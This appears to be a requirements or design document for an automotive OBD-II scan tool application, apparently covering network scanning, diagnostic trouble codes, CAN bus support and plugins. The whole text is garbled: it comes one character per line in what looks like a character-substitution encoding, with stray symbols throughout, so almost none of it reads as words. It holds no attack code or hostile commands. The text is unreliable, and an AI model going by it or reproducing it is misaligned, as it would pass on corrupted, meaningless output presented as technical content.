V
j
W
Y
È
`
Q
Y
t
e
W
W
e
r
T
_
{
T
_
t
e
Z
¢
^
V
`
T
e
_
•
q
Y
`
r
e
Z
s
}
Z
e
`
e
U
e
W
]
S
Y
c
È
•
z
Y
V
c
Y
Z
T
_
t
e
Z
^
V
`
T
e
_
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
N
È
•
u
V
`
V
}
V
Z
V
^
Y
`
Y
Z
V
c
Æ
]
S
`
Y
c
v
V
W
]
Y
È
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
h
È
V
_
c
•
¥
Z
V
^
Y
k
u
^
Y
V
_
T
_
{
V
S
S
}
Y
U
T
£
Y
c
T
_
l
p
§
h
N
y
|
¢
a
È
l
p
§
h
N
y
|
¢
n
O
h
N
ÿ°
ÿ
M
L
K
I
³
H
²
²
L
I
µ
I
L
9
H
µ
9
³
H
²
9
¤
Q
Y
_
Y
`
r
e
Z
s
S
U
V
_
_
Y
Z
`
e
e
W
}
Z
e
v
T
c
Y
S
`
Q
Y
V
j
T
W
T
`
R
`
e
Z
]
_
S
U
V
_
S
e
t
`
Q
Y
V
]
`
e
^
e
`
T
v
Y
_
Y
`
r
e
Z
s
`
e
c
Y
`
Y
Z
^
T
_
Y
r
Q
V
`
c
Y
v
T
U
Y
S
V
Z
Y
V
v
V
T
W
V
j
W
Y
O
¤
Q
Y
S
U
V
_
_
Y
Z
r
T
W
W
V
`
`
Y
^
}
`
`
e
c
Y
`
Y
Z
^
T
_
Y
V
W
W
`
Q
Y
^
e
c
]
W
Y
S
}
Z
Y
S
Y
_
`
T
_
`
Q
Y
v
Y
Q
T
U
W
Y
È
V
_
c
T
c
Y
_
`
T
t
R
Y
V
U
Q
^
e
c
]
W
Y
V
S
^
]
U
Q
V
S
}
e
S
S
T
j
W
Y
O
ÿ°
ÿ°
L
K
I
0
:
µ
¯
I
H
²
.
¯
³
H
¤
Q
Y
_
Y
`
r
e
Z
s
Y
¨
}
W
e
Z
V
`
T
e
_
`
e
e
W
}
Z
e
v
T
c
Y
S
`
Q
Y
V
j
T
W
T
`
R
`
e
Z
Y
V
c
V
_
c
r
Z
T
`
Y
V
Z
j
T
`
Z
V
Z
R
c
V
`
V
e
_
`
Q
Y
V
]
`
e
^
e
`
T
v
Y
_
Y
`
r
e
Z
s
O
u
V
`
V
Z
Y
U
Y
T
v
Y
c
e
_
S
`
V
_
c
V
Z
c
T
_
}
]
`
T
S
}
V
S
S
Y
c
`
e
`
Q
Y
_
Y
`
r
e
Z
s
V
_
c
c
V
`
V
t
Z
e
^
`
Q
Y
_
Y
`
r
e
Z
s
T
S
Z
Y
W
V
R
Y
c
j
V
U
s
e
_
S
`
V
_
c
V
Z
c
e
]
`
}
]
`
O
u
V
`
V
T
S
Y
S
U
V
}
Y
c
V
U
U
e
Z
c
T
_
{
`
e
`
Q
Y
m
~
u
e
v
Y
Z
S
`
Z
Y
V
^
}
Z
e
`
e
U
e
W
S
}
Y
U
T
£
Y
c
T
_
S
Y
U
`
T
e
_
h
O
N
O
h
`
e
}
Z
Y
S
Y
Z
v
Y
}
V
U
s
Y
`
j
e
]
_
c
V
Z
T
Y
S
O
ÿ°
ÿ
¶
³
H
²
.
¯
³
H
²
¯
;
:
³
H
²
¯
³
H
²
.
¯
5
´
²
³
²
H
¯
/
¤
Q
Y
S
U
V
_
`
e
e
W
}
Z
e
v
T
c
Y
S
S
U
V
_
`
e
e
W
t
]
_
U
`
T
e
_
V
W
T
`
R
V
S
S
}
Y
U
T
£
Y
c
j
R
l
p
§
N
y
|
O
p
U
U
e
Z
c
T
_
{
W
R
È
U
e
^
^
]
_
T
U
V
`
T
e
_
j
Y
`
r
Y
Y
_
`
Q
Y
S
U
V
_
`
e
e
W
V
_
c
`
Q
Y
v
Y
Q
T
U
W
Y
r
T
W
W
S
]
}
}
e
Z
`
•
p
]
`
e
^
V
`
T
U
c
Y
`
Y
Z
^
T
_
V
`
T
e
_
e
t
j
]
S
S
Y
S
}
Z
Y
S
Y
_
`
T
_
`
Q
Y
v
Y
Q
T
U
W
Y
t
Z
e
^
`
Q
Y
Q
V
Z
c
¢
r
V
Z
Y
T
_
`
Y
Z
t
V
U
Y
}
Z
Y
S
Y
_
`
È
•
o
e
^
}
W
Y
`
T
e
_
V
_
c
S
]
}
}
e
Z
`
e
t
e
_
¢
j
e
V
Z
c
S
R
S
`
Y
^
Z
Y
V
c
T
_
Y
S
S
`
Y
S
`
S
È
•
d
V
W
t
]
_
U
`
T
e
_
T
_
c
T
U
V
`
e
Z
W
T
{
Q
`
S
`
V
`
]
S
V
_
c
È
T
t
V
}
}
W
T
U
V
j
W
Y
È
Z
Y
V
S
e
_
e
Z
Z
Y
V
S
e
_
S
t
e
Z
T
W
W
]
^
T
_
V
`
T
e
_
È
•
m
j
`
V
T
_
T
_
{
V
_
c
c
T
S
}
W
V
R
T
_
{
Y
^
T
S
S
T
e
_
S
Z
Y
W
V
`
Y
c
c
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
È
V
_
c
•
m
j
`
V
T
_
T
_
{
V
_
c
c
T
S
}
W
V
R
T
_
{
Y
^
T
S
S
T
e
_
S
Z
Y
W
V
`
Y
c
U
]
Z
Z
Y
_
`
c
V
`
V
È
t
Z
Y
Y
Y
t
Z
V
^
Y
c
V
`
V
È
V
_
c
`
Y
S
`
}
V
Z
V
^
Y
`
Y
Z
S
V
_
c
Z
Y
S
]
W
`
S
O
b
Q
Y
Z
Y
`
Q
Y
S
U
V
_
`
e
e
W
T
S
e
_
W
R
S
}
Y
U
T
£
Y
c
`
e
S
]
}
}
e
Z
`
V
W
T
^
T
`
Y
c
Z
V
_
{
Y
e
t
c
T
V
{
_
e
S
`
T
U
}
Z
e
U
Y
c
]
Z
Y
S
È
`
Q
Y
S
U
V
_
`
e
e
W
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
j
Y
Y
¨
}
V
_
c
Y
c
`
e
}
Z
e
v
T
c
Y
`
Q
Y
t
]
W
W
Z
V
_
{
Y
e
t
S
T
^
T
W
V
Z
t
]
_
U
`
T
e
_
V
W
T
`
R
O
¥
e
Z
Y
¨
V
^
}
W
Y
È
V
W
W
c
T
V
{
_
e
S
`
T
U
`
Z
e
]
j
W
Y
U
e
c
Y
S
È
V
_
c
V
W
W
t
Z
Y
Y
Y
t
Z
V
^
Y
c
V
`
V
V
_
c
`
Y
S
`
}
V
Z
V
^
Y
`
Y
Z
S
r
T
W
W
j
Y
S
]
}
}
e
Z
`
Y
c
È
_
e
`
e
_
W
R
`
Q
e
S
Y
Z
Y
W
V
`
Y
c
`
e
Y
^
T
S
S
T
e
_
S
U
e
_
`
Z
e
W
O
¤
Q
Y
]
S
Y
Z
T
_
`
Y
Z
t
V
U
Y
e
t
`
Q
Y
S
U
V
_
`
e
e
W
r
T
W
W
S
]
}
}
e
Z
`
V
W
T
_
Y
e
Z
T
Y
_
`
Y
c
`
Y
¨
`
T
_
`
Y
Z
t
V
U
Y
V
_
c
V
{
Z
V
}
Q
T
U
V
W
T
_
`
Y
Z
t
V
U
Y
^
e
c
Y
O
.
L
:
´
H
¯
<
L
I
²
L
I
H
³
L
¤
Q
Y
`
Y
¨
`
]
V
W
]
S
Y
Z
T
_
`
Y
Z
t
V
U
Y
`
e
`
Q
Y
S
U
V
_
`
e
e
W
r
T
W
W
j
Y
W
T
_
Y
e
Z
T
Y
_
`
Y
c
O
¥
]
_
U
`
T
e
_
V
W
T
`
R
`
Q
V
`
r
e
]
W
c
j
Y
V
r
s
r
V
Z
c
r
T
`
Q
V
`
Y
¨
`
c
T
S
}
W
V
R
È
S
]
U
Q
V
S
{
Z
V
}
Q
T
_
{
V
_
c
U
e
_
`
T
_
]
e
]
S
W
R
]
}
c
V
`
Y
c
Z
Y
S
]
W
`
S
È
r
T
W
W
_
e
`
j
Y
S
]
}
}
e
Z
`
Y
c
r
T
`
Q
`
Q
T
S
T
_
`
Y
Z
t
V
U
Y
O
h
h
I
H
µ
³
H
¯
<
L
I
²
L
I
H
³
L
¤
Q
Y
{
Z
V
}
Q
T
U
V
W
]
S
Y
Z
T
_
`
Y
Z
t
V
U
Y
`
e
`
Q
Y
S
U
V
_
`
e
e
W
r
T
W
W
}
Z
e
v
T
c
Y
V
S
T
^
}
W
Y
È
T
_
`
]
T
`
T
v
Y
T
_
`
Y
Z
t
V
U
Y
`
e
`
Q
Y
U
e
^
^
e
_
S
U
V
_
`
e
e
W
t
]
_
U
`
T
e
_
S
O
¤
Q
Y
S
U
V
_
`
e
e
W
r
T
_
c
e
r
r
T
W
W
}
Z
e
v
T
c
Y
T
U
e
_
S
t
e
Z
T
_
T
`
T
V
`
T
_
{
U
e
^
^
V
_
c
S
S
U
V
_
`
e
e
W
U
e
^
¢
^
V
_
c
S
O
[
Y
S
]
W
`
S
r
T
W
W
j
Y
c
T
S
}
W
V
R
Y
c
V
W
}
Q
V
_
]
^
Y
Z
T
U
V
W
W
R
e
Z
{
Z
V
}
Q
T
U
V
W
W
R
T
_
`
Q
Y
S
V
^
Y
r
T
_
c
e
r
O
u
T
S
}
W
V
R
T
_
{
^
]
W
`
T
}
W
Y
Z
Y
S
]
W
`
S
r
T
W
W
j
Y
S
]
}
}
e
Z
`
Y
c
O
¤
Q
Y
]
S
Y
Z
r
T
W
W
j
Y
V
j
W
Y
S
Y
¢
W
Y
U
`
r
Q
Y
`
Q
Y
Z
e
Z
_
e
`
Z
Y
S
]
W
`
S
V
Z
Y
U
e
_
`
T
_
]
e
]
S
W
R
]
}
c
V
`
Y
c
O
¤
Q
Y
]
S
Y
Z
^
V
R
V
W
S
e
T
_
T
`
T
V
`
Y
V
_
]
}
c
V
`
Y
e
t
V
Z
Y
S
]
W
`
v
V
W
]
Y
O
ÿ°
ÿ
=
¬
®
H
²
²
H
²
²
¤
Q
Y
m
`
`
e
d
V
_
_
`
e
e
W
}
Z
e
v
T
c
Y
S
Q
T
{
Q
W
Y
v
Y
W
U
e
_
`
Z
e
W
V
_
c
^
e
_
T
`
e
Z
T
_
{
e
t
v
Y
Q
T
U
W
Y
}
V
¢
Z
V
^
Y
`
Y
Z
S
v
T
V
`
Q
Y
V
]
`
e
^
e
`
T
v
Y
j
]
S
O
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
}
Z
e
v
T
c
Y
j
e
`
Q
`
Y
¨
`
V
_
c
{
Z
V
}
Q
T
U
V
W
T
_
`
Y
Z
t
V
U
Y
S
O
L
¯
¯
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
U
e
_
`
V
T
_
V
`
Y
¨
`
j
V
S
Y
c
U
e
^
^
V
_
c
W
T
_
Y
T
_
`
Y
Z
t
V
U
Y
O
¤
Q
T
S
T
_
`
Y
Z
t
V
U
Y
r
T
W
W
V
W
W
e
r
`
Q
Y
]
S
Y
Z
`
e
T
_
T
`
T
V
`
Y
U
e
^
^
V
_
c
S
`
e
`
Q
Y
V
}
}
W
T
U
V
`
T
e
_
fV
_
c
È
c
Y
¢
}
Y
_
c
T
_
{
e
_
`
Q
Y
U
e
^
^
V
_
c
È
Z
Y
\
]
Y
S
`
S
e
_
`
Q
Y
V
]
`
e
^
e
`
T
v
Y
j
]
S
g
O
¤
Q
T
S
T
_
`
Y
Z
t
V
U
Y
r
T
W
W
V
W
S
e
V
W
W
e
r
È
r
Q
Y
Z
Y
V
}
}
W
T
U
V
j
W
Y
È
Z
Y
`
]
Z
_
e
t
V
W
}
Q
V
_
]
^
Y
Z
T
U
Z
Y
S
]
W
`
S
e
t
U
e
^
^
V
_
c
S
O
¤
Q
Y
S
Q
Y
W
W
T
_
`
Y
Z
t
V
U
Y
T
S
V
_
T
_
`
Z
T
_
S
T
U
}
V
Z
`
e
t
`
Q
Y
V
}
}
W
T
U
V
`
T
e
_
Ç
T
`
T
S
_
e
`
e
}
`
T
e
_
V
W
V
S
V
}
W
]
{
T
_
O
²
J
K
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
}
Z
e
v
T
c
Y
{
Z
V
}
Q
T
U
r
T
_
c
e
r
S
t
e
Z
{
Z
V
}
Q
T
U
V
W
V
U
U
Y
S
S
`
e
S
T
^
T
W
V
Z
t
]
_
U
`
T
e
_
V
W
T
`
R
V
v
V
T
W
V
j
W
Y
`
Q
Z
e
]
{
Q
`
Q
Y
S
Q
Y
W
W
O
¤
Q
T
S
t
]
_
U
`
T
e
_
V
W
T
`
R
T
_
U
W
]
c
Y
S
S
U
V
_
`
e
e
W
U
e
^
^
V
_
c
S
V
_
c
Z
Y
S
]
W
`
S
V
S
r
Y
W
W
V
S
U
e
_
£
{
]
Z
V
`
T
e
_
e
t
`
Q
Y
V
}
}
W
T
U
V
`
T
e
_
V
_
c
U
e
_
£
{
]
Z
V
`
T
e
_
e
t
}
W
]
{
T
_
S
O
«
²
H
¯
/
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
}
Z
e
v
T
c
Y
V
]
{
^
Y
_
`
Y
c
v
Y
Q
T
U
W
Y
e
}
Y
Z
V
`
T
e
_
t
V
U
T
W
T
`
T
Y
S
O
¤
Q
Y
S
Y
t
V
U
T
W
T
`
T
Y
S
r
T
W
W
j
Y
V
v
V
T
W
V
j
W
Y
V
S
U
e
^
^
V
_
c
S
`
e
`
Q
Y
S
Q
Y
W
W
È
V
_
c
Z
Y
S
]
W
`
S
r
T
W
W
j
Y
V
v
V
T
W
V
j
W
Y
`
e
{
Z
V
}
Q
T
U
V
W
V
_
c
V
W
}
Q
V
_
]
^
Y
Z
T
U
Z
Y
S
]
W
`
}
W
]
{
T
_
S
O
¤
Q
Y
t
V
U
T
W
T
`
T
Y
S
}
Z
e
v
T
c
Y
c
T
_
U
W
]
c
Y
•
§
S
`
T
^
V
`
Y
c
}
e
r
Y
Z
U
V
W
U
]
W
V
`
T
e
_
f
c
R
_
V
^
e
^
Y
`
Y
Z
g
È
•
¥
]
Y
W
Y
U
e
_
e
^
R
U
V
W
U
]
W
V
`
T
e
_
È
T
_
U
W
]
c
T
_
{
^
e
v
T
_
{
V
v
Y
Z
V
{
Y
t
]
Y
W
U
e
_
S
]
^
}
`
T
e
_
V
_
c
Y
S
`
T
^
V
`
Y
c
c
T
S
`
V
_
U
Y
t
e
Z
Z
Y
^
V
T
_
T
_
{
t
]
Y
W
È
•
b
Q
Y
Y
W
S
}
Y
Y
c
V
_
c
S
W
T
}
c
T
S
}
W
V
R
È
V
_
c
•
p
~
l
V
_
c
§
¤
o
V
U
`
T
v
T
`
R
O
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
}
Z
e
v
T
c
Y
V
U
e
_
£
{
]
Z
V
j
W
Y
t
V
U
T
W
T
`
R
`
e
Z
Y
U
e
^
^
Y
_
c
}
Z
e
}
Y
Z
v
Y
Q
T
U
W
Y
e
}
Y
Z
V
`
T
e
_
}
Z
e
U
Y
c
]
Z
Y
S
O
¤
Q
Y
S
Y
}
Z
e
U
Y
c
]
Z
Y
S
r
T
W
W
T
_
U
W
]
c
Y
•
z
Y
V
c
W
T
{
Q
`
S
e
}
Y
Z
V
`
T
e
_
V
S
U
e
^
}
V
Z
Y
c
`
e
S
]
_
Z
T
S
Y
V
_
c
S
Y
`
`
T
^
Y
V
_
c
e
]
`
S
T
c
Y
j
Z
T
{
Q
`
_
Y
S
S
È
•
u
e
e
Z
}
e
S
T
`
T
e
_
V
S
U
e
^
}
V
Z
Y
c
`
e
v
Y
Q
T
U
W
Y
S
}
Y
Y
c
È
•
u
e
e
Z
W
e
U
s
S
V
S
U
e
^
}
V
Z
Y
c
`
e
v
Y
Q
T
U
W
Y
S
}
Y
Y
c
È
V
_
c
•
b
T
}
Y
Z
e
}
Y
Z
V
`
T
e
_
V
S
U
e
^
}
V
Z
Y
c
`
e
Q
Y
V
c
W
T
{
Q
`
e
}
Y
Z
V
`
T
e
_
O
h
a
0
:
L
²
J
L
J
¸
H
²
J
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
V
W
W
e
r
Y
¨
`
Y
_
c
Y
c
U
e
_
`
Z
e
W
e
v
Y
Z
v
Y
¢
Q
T
U
W
Y
S
t
]
_
U
`
T
e
_
S
È
T
_
U
W
]
c
T
_
{
•
u
T
S
V
j
W
Y
p
~
l
©
§
¤
o
t
]
_
U
`
T
e
_
V
W
T
`
R
È
V
_
c
•
d
V
_
]
V
W
U
e
_
`
Z
e
W
e
t
p
~
l
©
§
¤
o
e
}
Y
Z
V
`
T
e
_
e
_
V
}
Y
Z
r
Q
Y
Y
W
È
}
Y
Z
V
¨
W
Y
È
e
Z
}
Y
Z
S
T
c
Y
j
V
S
T
S
O
¹
¯
´
²
¤
Q
Y
V
}
}
W
T
U
V
`
T
e
_
r
T
W
W
S
]
}
}
e
Z
`
V
}
W
]
{
T
_
^
Y
`
Q
e
c
r
Q
Y
Z
Y
j
R
e
}
`
T
e
_
V
W
t
]
_
U
¢
`
T
e
_
V
W
T
`
R
U
V
_
j
Y
T
^
}
W
Y
^
Y
_
`
Y
c
S
Y
}
V
Z
V
`
Y
t
Z
e
^
`
Q
Y
^
V
T
_
V
}
}
W
T
U
V
`
T
e
_
O
¤
Q
Y
}
W
]
{
T
_
V
Z
U
Q
T
`
Y
U
`
]
Z
Y
r
T
W
W
V
W
W
e
r
V
}
W
]
{
T
_
`
e
S
]
}
}
e
Z
`
e
_
Y
e
Z
^
e
Z
Y
e
t
`
Q
Y
t
e
W
W
e
r
T
_
{
t
V
U
T
W
T
`
T
Y
S
U
e
^
^
V
_
c
V
_
c
Z
Y
S
]
W
`
O
P
W
]
{
T
_
S
r
T
W
W
j
Y
V
W
W
e
r
Y
c
`
Q
Y
V
j
T
W
T
`
R
`
e
Q
V
v
Y
^
e
Z
Y
`
Q
V
_
e
_
Y
T
_
S
`
V
_
U
Y
e
t
`
Q
Y
}
W
]
{
T
_
V
U
`
T
v
Y
V
`
e
_
Y
`
T
^
Y
O
¤
Q
T
S
r
T
W
W
V
W
W
e
r
`
r
e
e
Z
^
e
Z
Y
c
T
ë
Y
Z
Y
_
`
}
W
]
{
T
_
U
e
_
£
{
]
Z
V
`
T
e
_
S
t
e
Z
V
S
T
_
{
W
Y
}
W
]
{
T
_
`
e
j
Y
V
U
`
T
v
Y
V
`
e
_
Y
`
T
^
Y
O
¤
Q
Y
t
e
W
W
e
r
T
_
{
S
`
V
_
c
V
Z
c
}
W
]
{
T
_
S
r
T
W
W
j
Y
T
^
}
W
Y
^
Y
_
`
Y
c
•
*
N
N
r
T
_
c
e
r
È
}
Z
e
v
T
c
T
_
{
V
`
Q
Y
^
V
j
W
Y
{
Z
V
}
Q
T
U
c
T
S
}
W
V
R
e
t
c
V
`
V
È
•
p
]
c
T
e
e
]
`
È
}
Z
e
v
T
c
T
_
{
V
_
V
]
c
T
j
W
Y
e
]
`
}
]
`
e
t
c
V
`
V
V
S
S
e
]
_
c
Y
ë
Y
U
`
S
e
Z
`
Y
¨
`
`
e
S
}
Y
Y
U
Q
È
•
~
T
`
^
V
}
e
]
`
}
]
`
È
}
Z
e
v
T
c
T
_
{
`
Q
Y
V
j
T
W
T
`
R
`
e
r
Z
T
`
Y
S
`
V
`
T
U
{
Z
V
}
Q
T
U
V
W
Z
Y
}
Z
Y
S
Y
_
`
V
¢
`
T
e
_
e
t
c
V
`
V
`
e
V
£
W
Y
È
•
¥
T
t
e
U
e
_
`
Z
e
W
È
}
Z
e
v
T
c
T
_
{
V
_
T
_
`
Y
Z
t
V
U
Y
S
T
^
T
W
V
Z
`
e
`
Q
Y
S
Q
Y
W
W
T
_
`
Y
Z
t
V
U
Y
e
_
V
W
e
U
V
W
£
W
Y
S
R
S
`
Y
^
£
t
e
È
V
_
c
•
§
¨
`
Y
Z
_
V
W
}
Z
e
{
Z
V
^
È
}
Z
e
v
T
c
T
_
{
`
Q
Y
V
j
T
W
T
`
R
`
e
Z
]
_
V
_
V
Z
j
T
`
Z
V
Z
R
}
Z
e
{
Z
V
^
j
V
S
Y
c
e
_
U
e
_
£
{
]
Z
V
j
W
Y
Y
v
Y
_
`
S
O
>
?
#
@
A
A
ç
D
À
$
H
/
L
I
F
P
Q
R
S
T
U
V
W
W
V
R
Y
Z
È
c
Y
£
_
Y
c
T
_
l
p
§
N
|
w
¡
t
e
Z
i
P
b
V
_
c
P
b
d
È
T
_
k
l
m
N
n
N
¢
N
È
k
l
m
N
n
h
a
¡
¢
N
t
e
Z
k
l
m
È
V
_
c
T
_
l
p
§
h
h
|
n
t
e
Z
o
p
q
O
$
H
/
L
I
u
V
`
V
X
T
_
s
W
V
R
Y
Z
È
c
Y
£
_
Y
c
T
_
l
p
§
N
|
w
¡
t
e
Z
i
P
b
V
_
c
P
b
d
È
T
_
k
l
m
N
n
N
¢
h
È
k
l
m
N
n
h
a
¡
¢
h
t
e
Z
k
l
m
È
V
_
c
T
_
l
p
§
h
h
|
n
t
e
Z
o
p
q
O
$
H
/
L
I
M
q
Y
`
r
e
Z
s
W
V
R
Y
Z
È
c
Y
£
_
Y
c
T
_
l
p
§
h
N
y
|
¢
N
È
l
p
§
h
N
y
|
¢
h
È
l
p
§
h
N
y
|
¢
a
È
l
p
§
h
N
y
|
¢
n
O
$
H
/
L
I
°
¤
Z
V
_
S
}
e
Z
`
W
V
R
Y
Z
È
_
e
`
c
Y
£
_
Y
c
j
R
l
p
§
e
Z
k
l
m
O
$
H
/
L
I
¶
l
Y
S
S
T
e
_
W
V
R
Y
Z
È
_
e
`
c
Y
£
_
Y
c
j
R
l
p
§
e
Z
k
l
m
O
$
H
/
L
I
=
P
Z
Y
S
Y
_
`
V
`
T
e
_
W
V
R
Y
Z
È
_
e
`
c
Y
£
_
Y
c
j
R
l
p
§
e
Z
k
l
m
O
$
H
/
L
I
B
p
}
}
W
T
U
V
`
T
e
_
W
V
R
Y
Z
È
c
Y
£
_
Y
c
T
_
l
p
§
h
N
y
|
¢
N
È
l
p
§
h
N
y
|
¢
h
È
l
p
§
h
N
y
|
¢
a
È
l
p
§
h
N
y
|
¢
n
t
e
Z
i
P
b
V
_
c
P
b
d
È
V
_
c
T
_
k
l
m
N
n
h
a
¡
¢
a
t
e
Z
k
l
m
O
h
n
C
@
B
C
D
Ã
¼
¾
D
D
ê
¾
Ã
ç
æ
¾
Ã
D
#
E
Á
Á
A
Ã
C
`
e
c
e
Z
Y
t
Y
Z
Y
_
U
Y
V
W
W
c
Y
v
T
U
Y
S
^
Y
_
`
T
e
_
Y
c
j
R
t
Z
Y
Y
c
T
V
{
È
e
_
e
}
Y
_
c
T
V
{
V
_
c
e
`
Q
Y
Z
W
T
S
`
S
F
í
ì
û
8
8
ø
þ
÷
÷
ò
ó
÷
ñ
_
e
_
Y
R
Y
`
G
F
í
H
ý
ñ
û
8
8
ø
þ
÷
÷
ò
ó
÷
ñ
¬
µ
L
²
¬
L
!
³
L
u
Y
v
T
U
Y
S
c
Y
£
_
Y
c
j
R
`
Q
Y
m
}
Y
_
m
`
`
e
P
Z
e
Æ
Y
U
`
O
L
I
H
¯
l
]
}
}
e
Z
`
S
i
P
b
È
P
b
d
È
k
l
m
È
V
_
c
o
p
q
¦
j
]
S
`
R
}
Y
S
O
¹
H
I
H
¯
¯
L
¯
l
]
}
}
e
Z
`
S
i
P
b
È
P
b
d
È
k
l
m
È
V
_
c
o
p
q
¦
j
]
S
`
R
}
Y
S
O
¹
¬
l
]
}
}
e
Z
`
c
Y
}
Y
_
c
S
e
_
}
Z
e
U
Y
S
S
e
Z
}
Y
Z
t
e
Z
^
V
_
U
Y
O
®
³
I
³
²
I
¯
¯
L
I
l
]
}
}
e
Z
`
c
Y
}
Y
_
c
S
e
_
^
T
U
Z
e
U
e
_
`
Z
e
W
W
Y
Z
}
Y
Z
t
e
Z
^
V
_
U
Y
V
_
c
£
Z
^
r
V
Z
Y
O
¹
I
I
H
H
¯
L
G
H
I
J
K
H
I
L
l
]
}
}
e
Z
`
c
Y
}
Y
_
c
S
e
_
Q
V
Z
c
r
V
Z
Y
}
Y
Z
t
e
Z
^
V
_
U
Y
V
_
c
£
Z
^
r
V
Z
Y
O
L
!
L
¯
µ
L
²
±
H
I
J
l
]
}
}
e
Z
`
S
i
P
b
È
P
b
d
È
k
l
m
È
V
_
c
o
p
q
¦
j
]
S
`
R
}
Y
S
O
«
²
J
/
H
L
I
k
_
`
Y
Z
t
V
U
Y
S
U
Q
Y
^
V
`
T
U
`
Q
V
`
S
]
}
}
e
Z
`
S
k
l
m
j
]
S
`
R
}
Y
O
±
ÿ
H
J
H
²
o
e
^
}
W
Y
`
Y
c
Y
v
T
U
Y
`
Q
V
`
S
]
}
}
e
Z
`
S
i
P
b
È
P
b
d
È
V
_
c
k
l
m
j
]
S
`
R
}
Y
S
O
I
L
J
:
²
k
_
`
Y
Z
t
V
U
Y
S
U
Q
Y
^
V
`
T
U
`
Q
V
`
S
]
}
}
e
Z
`
S
k
l
m
j
]
S
`
R
}
Y
O
0
$
®
M
:
:
k
_
`
Y
Z
t
V
U
Y
k
o
S
`
Q
V
`
S
]
}
}
e
Z
`
i
P
b
È
P
b
d
È
V
_
c
©
e
Z
k
l
m
j
]
S
`
R
}
Y
S
È
c
Y
¢
}
Y
_
c
T
_
{
e
_
^
e
c
Y
W
O
®
´
¯
µ
¯
L
:
0
²
²
L
L
I
²
o
e
^
}
W
Y
`
Y
c
Y
v
T
U
Y
S
`
Q
V
`
S
]
}
}
e
Z
`
i
P
b
È
P
b
d
È
V
_
c
©
e
Z
k
l
m
j
]
S
`
R
}
Y
S
È
c
Y
}
Y
_
c
T
_
{
e
_
^
e
c
Y
W
O
®
/
J
³
k
_
`
Y
Z
t
V
U
Y
k
o
`
Q
V
`
S
]
}
}
e
Z
`
S
i
P
b
È
P
b
d
È
k
l
m
È
V
_
c
o
p
q
j
]
S
`
R
}
Y
S
O
f
`
e
c
e
o
p
q
S
]
}
}
e
Z
`
W
T
^
T
`
Y
c
¦
g
¯
³
²
0
²
²
L
o
e
^
}
W
Y
`
Y
c
Y
v
T
U
Y
`
Q
V
`
S
]
}
}
e
Z
`
S
k
l
m
j
]
S
`
R
}
Y
O
@
K
Ã
A
C
A
D
A
À
#
E
Á
Á
A
Ã
C
¤
Q
Y
S
`
V
`
]
S
e
t
S
]
}
}
e
Z
`
t
e
Z
e
`
Q
Y
Z
}
Z
e
`
e
U
e
W
S
È
T
_
U
W
]
c
T
_
{
}
Z
e
}
Z
T
Y
`
V
Z
R
V
_
c
e
j
S
e
W
Y
`
Y
}
Z
e
`
e
U
e
W
S
È
T
S
c
Y
S
U
Z
T
j
Y
c
j
Y
W
e
r
O
h
w
L
í
ì
û
8
8
ø
þ
÷
M
¬
M
B
B
N
O
¬
M
B
P
Q
i
k
q
S
]
}
}
e
Z
`
T
S
T
_
U
e
^
}
W
Y
`
Y
c
]
Y
`
e
]
_
V
v
V
T
W
V
j
T
W
T
`
R
e
t
S
}
Y
U
O
M
«
0
I
F
¶
P
Q
i
P
b
V
_
c
P
b
d
j
]
S
}
Q
R
S
T
U
V
W
W
V
R
Y
Z
S
]
}
}
e
Z
`
Y
c
j
R
Q
V
Z
c
r
V
Z
Y
O
M
«
0
I
F
N
B
Q
m
~
u
h
S
U
V
_
`
e
e
W
T
^
}
W
Y
^
Y
_
`
Y
c
T
_
M
«
0
I
F
N
B
N
O
«
0
I
F
N
P
Q
m
~
u
h
c
T
V
{
_
e
S
`
T
U
`
Y
S
`
^
e
c
Y
S
T
^
}
W
Y
^
Y
_
`
Y
c
T
_
M
«
0
I
P
F
Q
l
p
§
u
¤
o
c
Y
£
_
T
`
T
e
_
S
M
«
0
I
F
B
,
F
O
«
0
I
F
B
,
O
«
0
I
F
B
,
M
O
«
0
I
F
B
,
°
Q
m
~
u
h
_
Y
`
r
e
Z
s
^
Y
S
S
V
{
Y
S
M
«
0
I
F
=
Q
u
V
`
V
W
T
_
s
S
Y
U
]
Z
T
`
R
M
«
0
I
°
Q
m
~
u
h
o
p
q
S
]
}
}
e
Z
`
M
¬
N
F
°
F
,
F
O
¬
N
F
°
F
,
O
¬
N
F
°
F
,
M
Q
k
l
m
j
]
S
t
e
Z
^
V
`
M
¬
F
°
M
P
,
F
O
¬
F
°
M
P
,
O
¬
F
°
M
P
,
M
O
¬
F
°
M
P
,
°
Q
k
l
m
j
]
S
t
e
Z
^
V
`
t
e
Z
h
n
i
v
Y
Q
T
U
W
Y
S
L
í
û
8
8
ø
þ
ò
ý
÷
÷
õ
8
ü
÷
ý
þ
L
!
L
I
/
²
S
`
T
W
W
r
e
Z
s
T
_
{
L
í
H
ý
ñ
û
8
8
ø
þ
÷
¤
Q
Y
t
e
W
W
e
r
T
_
{
}
Z
e
`
e
U
e
W
S
V
Z
Y
_
e
`
f
R
Y
`
g
S
]
}
}
e
Z
`
Y
c
O
¤
Q
Y
S
`
V
`
]
S
e
t
Y
V
U
Q
}
Z
e
`
e
U
e
W
T
S
{
T
v
Y
_
j
Y
W
e
r
O
H
²
J
H
I
J
0
¬
±
k
l
m
N
w
¡
a
N
¢
w
È
§
]
Z
e
}
Y
m
~
u
¦
¬
±
m
_
¢
~
e
V
Z
c
u
T
V
{
_
e
S
`
T
U
S
k
O
¹
I
µ
I
L
H
I
/
«
i
b
©
p
]
c
T
x
Z
e
]
}
%
¹
q
e
T
_
t
e
O
%
¹
F
F
i
p
x
N
w
w
h
¦
%
¹
P
P
P
i
b
v
Y
Z
S
T
e
_
e
t
k
l
m
N
n
h
a
¡
¢
N
È
k
l
m
N
n
h
a
¡
¢
h
È
k
l
m
N
n
h
a
¡
¢
a
È
